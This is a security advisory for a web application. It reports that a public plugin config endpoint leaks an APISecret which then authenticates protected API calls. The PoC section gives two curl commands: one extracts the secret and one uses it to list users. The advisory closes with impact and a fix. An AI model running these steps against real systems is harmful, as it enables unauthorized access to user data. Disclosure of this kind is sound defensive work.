GHSA-xr49-f4rh-qcjf

Summary

An unauthenticated user can read APISecret from objects/plugins.json.php and use it to call protected API endpoints (e.g. users_list) without logging in.

Details

objects/plugins.json.php is public and still exposes plugin object_data containing APISecret. That secret is accepted by plugin/API/get.json.php as authentication.

PoC

1. Get plugin config (contains APISecret):

curl 'http://<host>/objects/plugins.json.php'

<img width="879" height="94" alt="image" src="https://github.com/user-attachments/assets/027073fc-dccd-4e1d-8450-ad12345e88eb" />

2. Copy APISecret from response, then call API directly:

curl --get 'http://<host>/plugin/API/get.json.php' \
  --data-urlencode 'APIName=users_list' \
  --data-urlencode 'APISecret=<APISecret>' \
  --data-urlencode 'rowCount=3' \
  --data-urlencode 'current=1'

<img width="1719" height="170" alt="image" src="https://github.com/user-attachments/assets/edd629be-e75c-40a2-a52f-2f2e6da99b79" />

Impact

Unauthenticated disclosure of sensitive config (APISecret) leading to unauthorized access to protected API data.

Recommended fix

Requiring admin auth for full plugin inventory/config endpoint.